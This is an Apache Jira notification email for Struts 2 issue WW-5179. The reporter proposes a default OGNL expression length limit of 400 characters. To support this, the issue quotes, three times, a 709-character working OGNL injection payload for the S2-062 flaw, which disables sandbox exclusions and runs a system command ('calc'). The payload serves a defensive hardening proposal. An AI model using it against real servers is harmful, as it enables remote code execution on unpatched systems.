[
https://issues.apache.org/jira/browse/WW-5179?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
tanli updated WW-5179:
----------------------
Description:
struts.ognl.expressionMaxLength
default set 400
i reduce the st062 exp
%\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
it's length is 709, so we default set ognl expression length is 400 could
protect our app safe.
and!
i think st can give a default num: a expression can have # nums limit
thx
was:
struts.ognl.expressionMaxLength
default set 400
i reduce the st062 exp
%\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
it's length is 709, so we default set ognl expression length is 400 could
protect our app safe.
> struts.ognl.expressionMaxLength default set 400
> -----------------------------------------------
>
> Key: WW-5179
> URL: https://issues.apache.org/jira/browse/WW-5179
> Project: Struts 2
> Issue Type: Improvement
> Components: Core
> Affects Versions: 2.6
> Reporter: tanli
> Priority: Major
>
> struts.ognl.expressionMaxLength
> default set 400
> i reduce the st062 exp
>
> %\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
> (#request.a.setBean(#request.get('struts.valueStack'))==true)+
> (#request.b=#@org.apache.commons.collections.BeanMap@{})+
> (#request.b.setBean(#request.get('a').get('context'))==true)+
> (#request.c=#@org.apache.commons.collections.BeanMap@{})+
> (#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
> (#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
>
> it's length is 709, so we default set ognl expression length is 400 could
> protect our app safe.
>
> and!
>
> i think st can give a default num: a expression can have # nums limit
>
> thx
--
This message was sent by Atlassian Jira
(v8.20.7#820007)
